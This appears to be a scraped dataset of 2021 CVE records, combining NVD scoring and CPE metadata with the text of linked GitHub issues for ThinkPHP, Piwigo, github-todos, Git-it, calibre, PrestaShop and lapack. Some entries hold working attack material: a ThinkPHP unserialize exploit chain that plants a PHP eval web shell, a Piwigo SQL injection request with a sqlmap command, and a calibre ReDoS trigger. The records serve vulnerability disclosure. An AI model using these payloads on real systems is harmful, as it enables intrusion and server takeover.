"impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/top-think/framework/issues/2561" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/top-think/framework/issues/2561" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkphp:thinkphp:6.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "EBFE4365-93B9-448E-92B1-25ADEC4888C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/top-think/framework/issues/2561
[ "Exploit", "Vendor Advisory" ]
github.com
[ "top-think", "framework" ]
# PHP unserialize vulnerability in v6.0.8-2 ## Vulnerability Demo This chain does not show back on the web page, but can execute system commands, and the public chain is a little different from the Internet First, simply write a route ```php <?php namespace app\controller; use app\BaseController; class Index extends BaseController { public function index() { if(isset($_POST['data'])){ @unserialize($_POST['data']); } } } ``` exp ```php <?php namespace League\Flysystem\Cached\Storage{ abstract class AbstractCache { protected $autosave = false; protected $complete = []; protected $cache = ['`echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+|base64 -d > 2.php`']; } } namespace think\filesystem{ use League\Flysystem\Cached\Storage\AbstractCache; class CacheStore extends AbstractCache { protected $store; protected $key; public function __construct($store,$key,$expire) { $this->key = $key; $this->store = $store; $this->expire = $expire; } } } namespace think\cache{ abstract class Driver{ } } namespace think\cache\driver{ use think\cache\Driver; class File extends Driver { protected $options = [ 'expire' => 0, 'cache_subdir' => false, 'prefix' => false, 'path' => 'y4tacker', 'hash_type' => 'md5', 'serialize' => ['system'], ]; } } namespace{ $b = new think\cache\driver\File(); $a = new think\filesystem\CacheStore($b,'y4tacker','1111'); echo urlencode(serialize($a)); } ``` Attempt to write file successful ![1](https://user-images.githubusercontent.com/56486273/124283223-3d8dd680-db7e-11eb-8068-5f999232f689.png) Ant-sword connection successful ![2](https://user-images.githubusercontent.com/56486273/124283269-4b435c00-db7e-11eb-95c8-a6ea225ab66a.png)
PHP unserialize vulnerability in v6.0.8
https://api.github.com/repos/top-think/framework/issues/2561/comments
0
2021-07-02T13:42:08Z
2021-07-02T13:42:15Z
https://github.com/top-think/framework/issues/2561
935,783,589
2,561
2,838
CVE-2021-40313
2021-12-06T21:15:07.867
Piwigo v11.5 was discovered to contain a SQL injection vulnerability via the parameter pwg_token in /admin/batch_manager_global.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1469" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1469" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:11.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "B6BC6DF8-D938-4413-B4C7-132BCC938E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Piwigo/Piwigo/issues/1469
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
I find that there is a sqli in piwigo,here are my descriptions; At first we need to login and then we can Visit the website http://your-url/admin.php then we need a Key Parameters called pwg_token,there are many ways to get a token i visit http://your-url/admin.php?page=user_list ![image](https://user-images.githubusercontent.com/56486273/131239935-1e1a76df-e502-48d7-bb29-82f8687b5280.png) then i got pwg_token=3c28c3bf6adc56b0695cf64073605f9b The point of vulnerability is in admin/batch_manager_global.php;The parameter selection is not filtered ![image](https://user-images.githubusercontent.com/56486273/131240000-fd43c30b-42bf-4d1e-8296-581e5b3bf08f.png) Unfiltered parametersselection is spliced ![image](https://user-images.githubusercontent.com/56486273/131240040-95838169-98c6-434e-be6d-890d9add0ba7.png) The next step is to capture packets using BurpSuite by simply constructing parameters selection%5B%5D=1&selectAction=delete_derivatives&submit=1&del_derivatives_type=1&del_tags%5B%5D=1&pwg_token=4a3513cd81aa311107704fd00bde0a79 Remember to replace the value of the token above ![image](https://user-images.githubusercontent.com/56486273/131240106-fd38c256-7ab4-4256-849c-e4eb3a36dbe7.png) Save parameters to file,then just use sqlmap to exploit python sqlmap.py -r 1233 --current-db ![image](https://user-images.githubusercontent.com/56486273/131240453-842b89ba-1604-465a-8802-6b8b984e1426.png)
[11.5]SQL injection
https://api.github.com/repos/Piwigo/Piwigo/issues/1469/comments
3
2021-08-29T05:50:52Z
2021-12-08T19:35:27Z
https://github.com/Piwigo/Piwigo/issues/1469
982,002,210
1,469
2,839
CVE-2021-44684
2021-12-07T00:15:07.997
naholyr github-todos 3.1.0 is vulnerable to command injection. The range argument for the _hook subcommand is concatenated without any validation, and is directly used by the exec function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/naholyr/github-todos/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/naholyr/github-todos/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:github-todos_project:github-todos:*:*:*:*:*:*:*:*", "matchCriteriaId": "EFCC5BBA-A251-4207-BFEA-B40214EE9F89", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/dwisiswant0/advisory/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dwisiswant0", "advisory" ]
## Description naholyr github-todos <= **3.1.0** is vulnerable to command injection. The range argument for the `_hook` subcommand is concatenated without any validation, and is directly used by the exec function. **CVE ID**: CVE-2021-44684 ## Proof-of-Concept ![PoC](https://user-images.githubusercontent.com/25837540/126303965-bddbc185-97e0-4033-9404-cead936d6749.png) ## Impact This issue may lead to arbitrary command execution. ## References - https://github.com/naholyr/github-todos/releases
OS Command Injection in github-todos
https://api.github.com/repos/dwisiswant0/advisory/issues/5/comments
2
2021-08-05T09:13:27Z
2021-12-06T23:39:09Z
https://github.com/dwisiswant0/advisory/issues/5
961,615,502
5
2,840
CVE-2021-44684
2021-12-07T00:15:07.997
naholyr github-todos 3.1.0 is vulnerable to command injection. The range argument for the _hook subcommand is concatenated without any validation, and is directly used by the exec function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/naholyr/github-todos/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/naholyr/github-todos/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:github-todos_project:github-todos:*:*:*:*:*:*:*:*", "matchCriteriaId": "EFCC5BBA-A251-4207-BFEA-B40214EE9F89", "versionEndExcluding": null, "versionEndIncluding": "3.1.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/naholyr/github-todos/issues/34
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "naholyr", "github-todos" ]
Hi there, I couldn't find a `SECURITY.md` in your repository and am not sure how to best contact you privately to disclose a security issue. Can you add a `SECURITY.md` file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a [security policy](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e-mail within the next hour with more info. Thanks! (cc @huntr-helper)
Trying to get in touch regarding a security issue
https://api.github.com/repos/naholyr/github-todos/issues/34/comments
0
2021-07-20T09:57:02Z
2021-07-20T09:57:02Z
https://github.com/naholyr/github-todos/issues/34
948,492,971
34
2,841
CVE-2021-44685
2021-12-07T00:15:08.043
Git-it through 4.4.0 allows OS command injection at the Branches Aren't Just For Birds challenge step. During the verification process, it attempts to run the reflog command followed by the current branch name (which is not sanitized for execution).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jlord/git-it-electron/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jlord/git-it-electron/releases" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:git-it_project:git-it:*:*:*:*:*:*:*:*", "matchCriteriaId": "DBDE9254-C244-4B34-9CCB-467059E3AC0C", "versionEndExcluding": null, "versionEndIncluding": "4.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/dwisiswant0/advisory/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dwisiswant0", "advisory" ]
## Description Git-it through 4.4.0 allows OS command injection at the _Branches Aren't Just For Birds_ challenge step. During the verification process, it attempts to run the `reflog` command followed by the current branch name (which is not sanitized for execution). **CVE ID**: CVE-2021-44685 ## Proof-of-Concept Vulnerable code: https://github.com/jlord/git-it-electron/blob/4f397578eb057b6b4f8d2f3ffcccc57c5213e463/lib/verify/branches_arent_just_for_birds.js#L55 ![Git it OS Command Injection Proof-of-Concept](https://user-images.githubusercontent.com/25837540/144939125-ca916fd0-bd06-43ee-8ccd-a3ca50b8dd7f.gif) > See in [high-quality video here](https://github.com/dwisiswant0/advisory/raw/master/.poc/CVE-2021-44685.mp4). ## Impact This issue may lead to arbitrary command execution. ## References - https://github.com/jlord/git-it-electron/releases - https://github.com/dwisiswant0/advisory/raw/master/.poc/CVE-2021-44685.mp4
OS Command Injection in Git-it
https://api.github.com/repos/dwisiswant0/advisory/issues/3/comments
2
2021-08-05T09:11:06Z
2021-12-06T23:48:40Z
https://github.com/dwisiswant0/advisory/issues/3
961,613,266
3
2,842
CVE-2021-44686
2021-12-07T00:15:08.087
calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service) in html_preprocess_rules in ebooks/conversion/preprocess.py.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://bugs.launchpad.net/calibre/+bug/1951979" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/18" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kovidgoyal/calibre/compare/v5.31.1...v5.32.0" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W7QKFPYJ23KG6WJ5NIYAM4N2NWZCLQGL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://bugs.launchpad.net/calibre/+bug/1951979" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kovidgoyal/calibre/compare/v5.31.1...v5.32.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W7QKFPYJ23KG6WJ5NIYAM4N2NWZCLQGL/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*", "matchCriteriaId": "9318CDD6-0832-47C8-A748-63753C21CEE9", "versionEndExcluding": "5.32.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/dwisiswant0/advisory/issues/18
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "dwisiswant0", "advisory" ]
## Description calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service). **CVE ID**: CVE-2021-44686 ## Proof of Concept Vulnerable code: https://github.com/kovidgoyal/calibre/blob/39a22268b930f0d0cf51a42b556982da5f3dbf4d/src/calibre/ebooks/conversion/preprocess.py#L383 To see that the regular expression is vulnerable, copy-paste it into a separate file & run the code as shown below. ```python import re reg = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE|re.DOTALL) reg.match('<head>' + '\n' * 1337) ``` ## Impact This issue may lead to a denial of service. ## References - https://bugs.launchpad.net/calibre/+bug/1951979 - https://github.com/kovidgoyal/calibre/compare/v5.31.1...v5.32.0
ReDoS in calibre
https://api.github.com/repos/dwisiswant0/advisory/issues/18/comments
1
2021-11-23T15:34:30Z
2021-12-06T23:39:04Z
https://github.com/dwisiswant0/advisory/issues/18
1,061,426,157
18
2,843
CVE-2021-43789
2021-12-07T17:15:10.027
PrestaShop is an Open Source e-commerce web application. Versions of PrestaShop prior to 1.7.8.2 are vulnerable to blind SQL injection using search filters with `orderBy` and `sortOrder` parameters. The problem is fixed in version 1.7.8.2.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PrestaShop/PrestaShop/issues/26623" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.2" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-6xxj-gcjq-wgf4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PrestaShop/PrestaShop/issues/26623" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-6xxj-gcjq-wgf4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:*", "matchCriteriaId": "247D35ED-46EB-43B9-91FB-1849EDC3B152", "versionEndExcluding": "1.7.8.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.7.5.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/PrestaShop/PrestaShop/issues/26623
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PrestaShop", "PrestaShop" ]
This issue tracks the status of the PrestaShop 1.7.8.2 release ### Information Q | A -----------------------|--------------- **Type** | Patch version **Build date** | 2021-12-02 **Milestone** | https://github.com/PrestaShop/PrestaShop/milestone/78 **Kanban** | https://github.com/PrestaShop/PrestaShop/projects/21 **Delivery date** | 2021-12-02 ### Current status - [x] Development - [x] Build - [x] QA validation - [x] Release - [x] Available for upgrade - [x] Docker image
Release 1.7.8.2
https://api.github.com/repos/PrestaShop/PrestaShop/issues/26623/comments
2
2021-11-16T09:29:09Z
2021-12-07T16:04:04Z
https://github.com/PrestaShop/PrestaShop/issues/26623
1,054,647,748
26,623
2,844
CVE-2021-4048
2021-12-08T22:15:10.220
An out-of-bounds read flaw was found in the CLARRV, DLARRV, SLARRV, and ZLARRV functions in lapack through version 3.10.0, as also used in OpenBLAS before version 0.3.18. Specially crafted inputs passed to these functions could cause an application using lapack to crash or possibly disclose portions of its memory.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/JuliaLang/julia/issues/42415" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Reference-LAPACK/lapack/commit/38f3eeee3108b18158409ca2a100e6fe03754781" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Reference-LAPACK/lapack/pull/625" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xianyi/OpenBLAS/commit/2be5ee3cca97a597f2ee2118808a2d5eacea050c" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xianyi/OpenBLAS/commit/337b65133df174796794871b3988cd03426e6d41" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xianyi/OpenBLAS/commit/ddb0ff5353637bb5f5ad060c9620e334c143e3d7" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xianyi/OpenBLAS/commit/fe497efa0510466fd93578aaf9da1ad8ed4edbe7" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QFEVOCUG2UXMVMFMTU4ONJVDEHY2LW2/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DROZM4M2QRKSD6FBO4BHSV2QMIRJQPHT/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/JuliaLang/julia/issues/42415" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Reference-LAPACK/lapack/commit/38f3eeee3108b18158409ca2a100e6fe03754781" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Reference-LAPACK/lapack/pull/625" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xianyi/OpenBLAS/commit/2be5ee3cca97a597f2ee2118808a2d5eacea050c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xianyi/OpenBLAS/commit/337b65133df174796794871b3988cd03426e6d41" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xianyi/OpenBLAS/commit/ddb0ff5353637bb5f5ad060c9620e334c143e3d7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xianyi/OpenBLAS/commit/fe497efa0510466fd93578aaf9da1ad8ed4edbe7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QFEVOCUG2UXMVMFMTU4ONJVDEHY2LW2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DROZM4M2QRKSD6FBO4BHSV2QMIRJQPHT/" } ]
